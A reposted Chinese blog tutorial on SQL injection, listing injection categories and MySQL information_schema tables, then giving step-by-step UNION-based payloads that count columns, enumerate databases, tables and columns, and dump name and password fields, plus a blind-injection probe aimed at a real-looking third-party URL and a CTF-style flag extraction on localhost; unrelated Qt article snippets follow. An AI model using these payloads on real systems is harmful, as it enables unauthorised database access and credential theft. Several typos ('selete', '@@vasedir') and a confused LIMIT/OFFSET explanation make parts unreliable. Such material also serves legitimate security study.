sql注入

最新推荐文章于 2024-09-05 14:30:47 发布
最新推荐文章于 2024-09-05 14:30:47 发布
阅读量144 收藏
点赞数
文章标签: 数据库 php 操作系统
原文链接:https://my.oschina.net/sosomywork/blog/979278
版权

sql注入分类:
基于联合查询
基于错误回显
基于盲注,分时间盲注和布尔型的盲注
基于user-agent
基于feferer
基于cookie
二次注入
宽字节注入

通过执行等同于将一个表追加到另一个表的操作来组合两个表的查询
首先来了解下mysql的系统函数
user() :当前使用者的用户名
database():当前数据库名
version():数据库版本
datadir:读取数据库的绝对路径
@@vasedir:mysql安装路径
@@version_compile_os:操作系统
concat():连接一个或者多个字符串
group_concat():连接一个组的所有字符串,并以逗号分隔每一条数据

理解Schema,schemata,schema_name,table_schema这几张表很重要

SCHEMATA表:储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等,
show databases的结果取之此表。
TABLES表:储存mysql中的表信息,
(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)
包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,
最后更新时间等。show tables from schemaname的结果取之此表
COLUMNS表:提供了表中的列信息,(当然也有数据库名和表名称这两列)
详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,
列的数据类型,列的编码类型,列的权限,注释等。
是show columns from schemaname.tablename的结果取之此表.

找到注入点后,我们用order by语句查询数据库中存在多少数据表
确定多少个表,为了便于说明,假设有三个数据表,
 Order by 3 返回正常
order by 4返回错误
然后使用and 1=2 union select 1,2,3 %23爆出可以回显敏感信息的位置,假设在2和3上
 
下面我们就要查询敏感信息了,就要用到上面所说的系统函数了
and 1=2 union select 1,version(),database()可以爆出当前使用的版本和数据库名
and 1=2 union select 1,2,schema_name from information_schema.schemata limit 1,1 
爆出数据库名,依次使用limit2,1往下爆库名,也可以使用group_concat函数全部爆出来 
and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata%23 。
我们假设其中有flag库
 
and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where schema_name=’flag’ 
爆出flag库下的所有的表,假设其中有flagtable表
 
and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =’flagtale’
爆出flagtable下的所有字段,假设有name和password字段
 
and 1=2 union select 1,2,group_concat(name,password) from flag.flagtable
爆出flag下的flagtable表的name和password的内容

1.http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持union查询

2.字段的判断
    order by 1
    order by 2
    order by 3
    ......
    ......
    ......

    根据order by+数字,可以判断出字段的长度,EG:3个字段 order by 1,order by 2,order by 3都显示正常,但是order by 4则出现显示错误

3.利用union select 0,1,2 order by 1测试出回县的数字,则可以测出数据库database(),版本号version(),使用者username().
    

    问题1:为什么不能用union select 0,1,2.为什么要加入order by 1,
    问题2:为什么不能用union select 1,2,3.

暴库: union select 0,databases(),2 order by 1.可以测出所使用的数据库
       union select 1,2,3 order by 1 limit 1 offset 1

4.报表
    例如爆出的库是:sql_test
    union (select 0,table_name,null from information_schema.tables where table_schema='sql_test') order by 1 limit 1 offset 1

    问题:order by 1 limit 1 offset 1是什么意思,为什么要便宜1个

5.爆列
    例如爆出的表是:t_flag
        http://localhost/v1/cE391yhdb43nH/index.php?id=1%20union%20(select%200,table_name,column_name%20from%20information_schema.columns    %20where
%20table_name=%27t_flag%27)%20order%20by%201%20limit%201%20offset%201#

6.爆数据

    
    union select 0,flag,null  from t_flag order by 1

注:
information_schema数据库表说明:
    

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之
此表。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。


经常用到在数据库中查询中间几条数据的需求
比如下面的sql语句:
① selete * from testtable limit 2,1;
② selete * from testtable limit 2 offset 1;
注意:
1.数据库数据计算是从0开始的
2.offset X是跳过X个数据,limit Y是选取Y个数据
3.limit  X,Y  中X表示跳过X个数据,读取Y个数据
这两个都是能完成需要,但是他们之间是有区别的:
①是从数据库中第三条开始查询,取一条数据,即第三条数据读取,一二条跳过
②是从数据库中的第二条数据开始查询两条数据,即第二条和第三条。

转载于:https://my.oschina.net/sosomywork/blog/979278

chipeng5747
关注
QT开发】树形控件项QTreeWidgetItem类详解及实战应用
科技改变人类,技术成就未来
07-07 2014
QTreeWidgetItemQt提供的一个功能强大且灵活的树形控件项类,通过本篇文章的学习,你应该对QTreeWidgetItem有了全面的理解,能够在自己的项目中正确使用它。QTreeWidgetItem在用户界面中帮助你更好地展示和管理树状数据,实现交互式和响应式的数据展示,有助于创建用户友好和高效的文件系统浏览器、项目管理工具、目录树等应用场景。
qt setData()和data()
weixin_34344677的博客
12-15 4052
简述 在GUI开发中,往往需要在界面中存储一些有用的数据,这些数据可以来自配置文件、注册表、数据库、或者是Server。 无论来自哪里,这些数据对于用户来说都是至关重要的,它们在交互过程中大部分都会被用到,例如:单击一个用户头像,显示该用户的详细信息(等级、昵称、姓名、个人说明)。     常见接口 Qt中,可以通过绝大部分已有的接口来存数数据、获取数据。例如: 存储数据 ...
QT之qcustomplot的setData()和addData()的区别
七 六 伍 的博客
02-15 7493
最近在使用qcustomplot模块的时候,把setData 和 addData 这两个绘制线段函数做了下对比, 1: setData 在添加大量数据的时候 会卡咯,而且数据多的时候 它值添加整数的数据 如下图: 下面的图是addData()函数添加的数据,这个官方给的Demo就有。很简单。 一样的数据 使用setData()重绘后 成了下面的样子, 前面一点是使用addData 又重绘的线段 代码: void MainWindow::on_start_pBt_clicked() {
Qt笔记】QTreeWidget控件详解
最新发布
qq_52924376的博客
09-05 2120
QTreeWidgetQt 框架中用于展示层次化数据的一个非常强大的控件,它继承自 QAbstractItemView 和 QTreeView,但提供了更为简便的接口来管理树形结构的数据。
QTreeWidgetItemsetData(int column,int role,QVariant& data)等,
09-16
Qt中QVariant是多种类型的联合,QVariant类中有个SetValue(T& value)方法,将自定义 T 类型的数据保存到QVariant对象中,可以理解为是自定义类型被封装成了QVariant的形式,这样,我们自定义的T类型的对象就能够通过所有参数和返回值为QVarian类型传递。比如QTableWidgetItemsetData(int column,QVariant& data)和QTreeWidgetItemsetData(int column,int role,QVariant& data)等,通过setData函数我们可以为每个单元格保存自己想绑定的数据及为每个树节点保存想绑定的自定义类型的数据。   但是,QVariant中的setValue方法的使用有个前提,就是我们自定义的类型要能被Qt所识别。那该怎样识别呢?   这就要用到宏定义Q_DECLARE_METATYPE了,通过这个宏定义可以将自定义的类型注册到Qt的元类型中,从而被Qt识别,通常在自定义类型定义之后使用。
QTreeWidgetsetData怎么干
高恩阳的博客
03-25 6063
struct User:public QObjectUserData { QString imgpath; int itemtype; }; Q_DECLARE_METATYPE(User) QTreeWidget *tree = new QTreeWidget; tree->setColumnCount(1); tree->setHeaderLabel("标题"); QTreeWidgetItem *item = new QTreeWidgetItem(0); item-.
QTreeWidget基础操作代码
03-25
本博文在CSDN IT1995有相关博文查阅。可以进入CSDN IT1995查看
Qt 中Treewidget添加右键菜单
weixin_30432579的博客
12-07 825
Qt+VS2005下,使用slot函数customContextMenuRequested(QPointpos)实现Treewidget的右键菜单栏。 1、在ui编辑界面中,右击QTreeWidget--> Connect Signal-->选择customContextMenuRequested(QPoint),添加slot函数。   在属性设置中,将contextMenuPo...
qtreewidget setData
09-24
引用提到,Qt中的QTreeWidgetItem类可以使用setData函数来设置数据。该函数的原型为void QTreeWidgetItem::setData(int column, int role, const QVariant &value)。其中,column参数表示列号,role参数表示数据角色...
qtreewidget setdata
04-06
b'qtreewidget setdata' 是一种在 PyQt 中使用的函数,用于设置 QTreeView 控件的数据。该函数接受一个 QModelIndex 对象和一个 QVariant 对象作为参数,用于更新指定行和列的数据值。这个函数可以在 QTreeView 控件...
QStandItem::setData()函数用法(解决设置了QIcon后,setData函数无效问题)(Qt)
净无邪博客
09-03 5963
博主用QStandItem::setData()函数后,发现设置了QStandItem::setIcon()函数后,用setData()函数无效。实际上,并不是无效,数据真实存储了,只是我们引用不对。 1.1错误分析 具体的引用应该用如下:data(Qt::UserRole+1) modeIndex.data(Qt::UserRole+1).toULongLong() 而不是用data(...
QTreeWidget项目拖拽功能
02-23
同时,自定义的QTreeWidgetItem类还可以重写`data()`和`setData()`方法,以便在拖放过程中正确处理数据。 7. **视觉反馈**: 为了提供更好的用户体验,你可能需要在拖动过程中改变鼠标形状或QTreeWidget的样式,以...
QT TreeWidget控件实现文件树 展示目录结构
Zhang_Y_Q的博客
03-10 1982
QT TreeWidget控件实现文件树 展示目录结构
控件QtreeView的实现
mike_digilink的专栏
12-12 799
<br />方法一:使用QDirModel进行目录的现实,QDirModel是QT中专为文件目录树型显示所提供的一种model。 具体使用如下:<br />#include <QtGui><br />int main(int argc, char *argv[])<br />{ <br />QApplication app(argc, argv);<br />QSplitter *splitter = new QSplitter;<br />        QDirModel *model = new QD
QTreeWidgetItemQt 框架中的一个类,用于在树形控件中表示和操作树节点
m0_46376834的博客
11-30 1164
QTreeWidgetItem 代表树形控件中的一个节点,可以包含子节点、显示文本、图标和其他相关数据。通过使用 QTreeWidgetItem,我们可以方便地创建和管理树形控件中的节点,构建具有层次结构的数据展示和操作功能。QTreeWidgetItemQt 框架中的一个类,用于在树形控件中表示和操作树节点。方法将任意类型的数据与节点关联起来,以便在需要时检索和使用。方法设置节点的文本和图标,用于显示在树形控件中。方法可以向节点添加子节点,并通过。等方法来遍历和访问节点的子节点。
PyQt(Python+Qt)学习随笔:QTreeWidgetItem项中列数据的访问方法
老猿Python
02-21 2498
老猿Python博文目录 专栏:使用PyQt开发图形界面Python应用 老猿Python博客地址 树型部件QTreeWidget中的QTreeWidgetItem项中可以有多列数据,每列数据可以根据列位置进行访问。项中列数据的访问方式有两种: 通过datasetData方法 可以通过项的data(int column, int role) 方法获取项中指定列指定角色的数据,也可以通过se...
QTreeWidgetItem添加自定义数据
sessos的博客
05-21 7441
QTreeWidgetItem添加自定义数据 本文简要介绍一个知识点,如题所示,就是如何给QTreeWidgetItem添加自定义数据。两种方法: 方法一 数据可以是任意类型(Variant类型),如果不是基本数据类型的数据,则需要定义一个结构体表示数据类型。这里这样定义: struct User:public QObjectUserData { QString imgpath; int itemtype; }; Q_DECLARE_METATYPE(User) QTreeWidget *
QTreeWidget
lavanana的博客
07-04 610
#include <QTreeWidget> #include <QHeaderView> { // 实例化树结构 QTreeWidget *pTreeWidget = new QTreeWidget(this); // 设置标头 pTreeWidget->header()->hide(); pTreeWid...
QTreeview之setData绑定一个对话框
ISmileLi的博客
11-21 1502
一、问题描述:点击QTreeview节点实现弹出一个对话框,由于每点击一个节点都要弹出一个对话框,所以把对话框定义成类的成员函数肯定是不行的。但是在多次点击同一个叶子节点时会弹出多个对话框,这又不满足需求啦。二、解决思路:要满足要求有两种思路,第一种是把treview节点和对应的对话框指针保存到一个容器中,每次点击时先查看容器中是否保存了该节点对应的窗口指针,这种方法应该是可行的,但是比较麻烦点;第
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值